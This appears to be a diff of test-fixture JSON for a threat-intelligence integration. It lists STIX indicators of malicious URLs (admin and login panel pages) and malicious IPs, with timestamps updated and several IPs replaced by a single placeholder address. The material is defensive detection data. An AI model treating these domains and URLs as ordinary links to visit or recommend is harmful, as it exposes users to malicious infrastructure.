@@ -25578,7 +25578,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388444641Z", + "ingested": "2021-12-13T08:38:40.025862500Z", "original": "{\"created\":\"2020-02-21T02:53:31.9Z\",\"description\":\"TS ID: 55333174443; iType: mal_url; State: active; Org: Fanavari Server Pars Argham Company Gostar Ltd.; Source: CyberCrime\",\"id\":\"indicator--4a97fc3d-210e-4367-ad04-f1b966433a32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-02-21T02:53:31.9Z\",\"name\":\"mal_url: http://perca.ir/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://perca.ir/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:31.9Z\"}", "category": "threat", "type": "indicator", @@ -25630,7 +25630,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388449109Z", + "ingested": "2021-12-13T08:38:40.025867400Z", "original": "{\"created\":\"2020-02-21T02:53:40.48Z\",\"description\":\"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-21T02:53:40.48Z\",\"name\":\"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:40.48Z\"}", "category": "threat", "type": "indicator", 
@@ -25682,7 +25682,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388453477Z", + "ingested": "2021-12-13T08:38:40.025873900Z", "original": "{\"created\":\"2020-02-21T02:53:42.327Z\",\"description\":\"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--c9d733d6-25c7-4306-9246-c08194e3073a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-21T02:53:42.327Z\",\"name\":\"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:42.327Z\"}", "category": "threat", "type": "indicator", @@ -25734,7 +25734,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388457936Z", + "ingested": "2021-12-13T08:38:40.025879800Z", "original": "{\"created\":\"2020-02-21T02:53:58.967Z\",\"description\":\"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-21T02:53:58.967Z\",\"name\":\"mal_url: http://liweff.eu/kp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://liweff.eu/kp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:53:58.967Z\"}", "category": "threat", "type": "indicator", 
@@ -25753,7 +25753,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://82.165.18.207/panel/admin.php", + "name": "mal_url: http://89.160.20.156/panel/admin.php", "description": "TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime", "modified": "2020-02-21T02:54:44.049Z", "valid_from": "2020-02-21T02:54:44.049Z", 
@@ -25778,16 +25778,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://82.165.18.207/panel/admin.php", + "original": "http://89.160.20.156/panel/admin.php", "scheme": "http", - "domain": "82.165.18.207", - "full": "http://82.165.18.207/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388462224Z", - "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://82.165.18.207/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://82.165.18.207/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", + "ingested": "2021-12-13T08:38:40.025886700Z", + "original": "{\"created\":\"2020-02-21T02:54:44.049Z\",\"description\":\"TS ID: 55333174436; iType: mal_url; State: active; Org: 1\u00261 Internet AG; Source: CyberCrime\",\"id\":\"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-20\"],\"modified\":\"2020-02-21T02:54:44.049Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.049Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25805,7 +25805,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.90.59.42", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime", "modified": "2020-02-21T02:54:44.075Z", "valid_from": "2020-02-21T02:54:44.075Z", @@ -25827,12 +25827,12 @@ "first_seen": "2020-02-21T02:54:44.075Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.90.59.42" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388467283Z", - "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 185.90.59.42\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.90.59.42']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", + "ingested": "2021-12-13T08:38:40.025893400Z", + "original": "{\"created\":\"2020-02-21T02:54:44.075Z\",\"description\":\"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime\",\"id\":\"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-50\"],\"modified\":\"2020-02-21T02:54:44.075Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-21T02:54:44.075Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -25883,7 +25883,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388472613Z", + "ingested": "2021-12-13T08:38:40.025900100Z", "original": "{\"created\":\"2020-02-22T02:52:52.6Z\",\"description\":\"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime\",\"id\":\"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-22T02:52:52.6Z\",\"name\":\"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:52.6Z\"}", "category": "threat", "type": "indicator", @@ -25935,7 +25935,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388479797Z", + "ingested": "2021-12-13T08:38:40.025906700Z", "original": "{\"created\":\"2020-02-22T02:52:53.322Z\",\"description\":\"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:52:53.322Z\",\"name\":\"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.322Z\"}", "category": "threat", "type": "indicator", 
@@ -25987,7 +25987,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388484535Z", + "ingested": "2021-12-13T08:38:40.025913700Z", "original": "{\"created\":\"2020-02-22T02:52:53.756Z\",\"description\":\"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:52:53.756Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.756Z\"}", "category": "threat", "type": "indicator", @@ -26039,7 +26039,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388489204Z", + "ingested": "2021-12-13T08:38:40.025920400Z", "original": "{\"created\":\"2020-02-22T02:52:53.779Z\",\"description\":\"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:53.779Z\",\"name\":\"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:53.779Z\"}", "category": "threat", "type": "indicator", 
@@ -26058,7 +26058,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://86.106.93.103/mpdu/index.php", + "name": "mal_url: http://89.160.20.156/mpdu/index.php", "description": "TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime", "modified": "2020-02-22T02:52:59.853Z", "valid_from": "2020-02-22T02:52:59.853Z", 
@@ -26083,16 +26083,16 @@ "url": { "path": "/mpdu/index.php", "extension": "php", - "original": "http://86.106.93.103/mpdu/index.php", + "original": "http://89.160.20.156/mpdu/index.php", "scheme": "http", - "domain": "86.106.93.103", - "full": "http://86.106.93.103/mpdu/index.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/mpdu/index.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388493492Z", - "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://86.106.93.103/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://86.106.93.103/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", + "ingested": "2021-12-13T08:38:40.025927100Z", + "original": "{\"created\":\"2020-02-22T02:52:59.853Z\",\"description\":\"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime\",\"id\":\"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-22T02:52:59.853Z\",\"name\":\"mal_url: http://89.160.20.156/mpdu/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/mpdu/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:52:59.853Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26110,7 +26110,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 95.142.44.87", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime", "modified": "2020-02-22T02:53:10.018Z", "valid_from": "2020-02-22T02:53:10.018Z", @@ -26132,12 +26132,12 @@ "first_seen": "2020-02-22T02:53:10.018Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "95.142.44.87" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388497971Z", - "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 95.142.44.87\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '95.142.44.87']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", + "ingested": "2021-12-13T08:38:40.025933600Z", + "original": "{\"created\":\"2020-02-22T02:53:10.018Z\",\"description\":\"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-22T02:53:10.018Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:10.018Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26188,7 +26188,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388502129Z", + "ingested": "2021-12-13T08:38:40.025940400Z", "original": "{\"created\":\"2020-02-22T02:53:11.62Z\",\"description\":\"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:53:11.62Z\",\"name\":\"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:11.62Z\"}", "category": "threat", "type": "indicator", @@ -26240,7 +26240,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388506477Z", + "ingested": "2021-12-13T08:38:40.025947300Z", "original": "{\"created\":\"2020-02-22T02:53:34.685Z\",\"description\":\"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime\",\"id\":\"indicator--773fabfe-63b5-4681-8189-4dffad1747fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-46\"],\"modified\":\"2020-02-22T02:53:34.685Z\",\"name\":\"mal_url: http://ccilfov.ro/css/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ccilfov.ro/css/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.685Z\"}", "category": "threat", "type": "indicator", 
@@ -26259,7 +26259,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 66.172.27.221", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime", "modified": "2020-02-22T02:53:34.733Z", "valid_from": "2020-02-22T02:53:34.733Z", @@ -26281,12 +26281,12 @@ "first_seen": "2020-02-22T02:53:34.733Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "66.172.27.221" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388510504Z", - "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 66.172.27.221\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '66.172.27.221']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", + "ingested": "2021-12-13T08:38:40.025954Z", + "original": "{\"created\":\"2020-02-22T02:53:34.733Z\",\"description\":\"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--5e32213f-5daa-4181-a108-0fc58482adcb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:53:34.733Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.733Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26337,7 +26337,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388514672Z", + "ingested": "2021-12-13T08:38:40.025959200Z", "original": "{\"created\":\"2020-02-22T02:53:34.767Z\",\"description\":\"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:53:34.767Z\",\"name\":\"mal_url: http://nortonlilly.info/zeya/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/zeya/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:34.767Z\"}", "category": "threat", "type": "indicator", @@ -26389,7 +26389,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388518980Z", + "ingested": "2021-12-13T08:38:40.025962400Z", "original": "{\"created\":\"2020-02-22T02:53:36.179Z\",\"description\":\"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:53:36.179Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:36.179Z\"}", "category": "threat", "type": "indicator", 
@@ -26441,7 +26441,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388523258Z", + "ingested": "2021-12-13T08:38:40.025967200Z", "original": "{\"created\":\"2020-02-22T02:53:45.219Z\",\"description\":\"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime\",\"id\":\"indicator--8d2d349a-763b-406b-ba8c-8ba684058028\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-22T02:53:45.219Z\",\"name\":\"mal_url: http://51.83.200.179/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://51.83.200.179/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:45.219Z\"}", "category": "threat", "type": "indicator", @@ -26493,7 +26493,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388527476Z", + "ingested": "2021-12-13T08:38:40.025972200Z", "original": "{\"created\":\"2020-02-22T02:53:56.922Z\",\"description\":\"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--965a2554-cc08-488c-8d81-a29e8402eec1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-92\"],\"modified\":\"2020-02-22T02:53:56.922Z\",\"name\":\"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:53:56.922Z\"}", "category": "threat", "type": "indicator", 
@@ -26545,7 +26545,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388531834Z", + "ingested": "2021-12-13T08:38:40.025978100Z", "original": "{\"created\":\"2020-02-22T02:54:18.93Z\",\"description\":\"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-22T02:54:18.93Z\",\"name\":\"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.93Z\"}", "category": "threat", "type": "indicator", @@ -26564,7 +26564,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 8.208.3.169", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime", "modified": "2020-02-22T02:54:18.975Z", "valid_from": "2020-02-22T02:54:18.975Z", 
@@ -26586,12 +26586,12 @@ "first_seen": "2020-02-22T02:54:18.975Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "8.208.3.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.388536072Z", - "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 8.208.3.169\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '8.208.3.169']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", + "ingested": "2021-12-13T08:38:40.025981700Z", + "original": "{\"created\":\"2020-02-22T02:54:18.975Z\",\"description\":\"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime\",\"id\":\"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-56\"],\"modified\":\"2020-02-22T02:54:18.975Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:18.975Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26642,7 +26642,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388540541Z", + "ingested": "2021-12-13T08:38:40.025986500Z", "original": "{\"created\":\"2020-02-22T02:54:27.432Z\",\"description\":\"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:27.432Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.432Z\"}", "category": "threat", "type": "indicator", @@ -26694,7 +26694,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388544688Z", + "ingested": "2021-12-13T08:38:40.025991100Z", "original": "{\"created\":\"2020-02-22T02:54:27.479Z\",\"description\":\"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:27.479Z\",\"name\":\"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:27.479Z\"}", "category": "threat", "type": "indicator", 
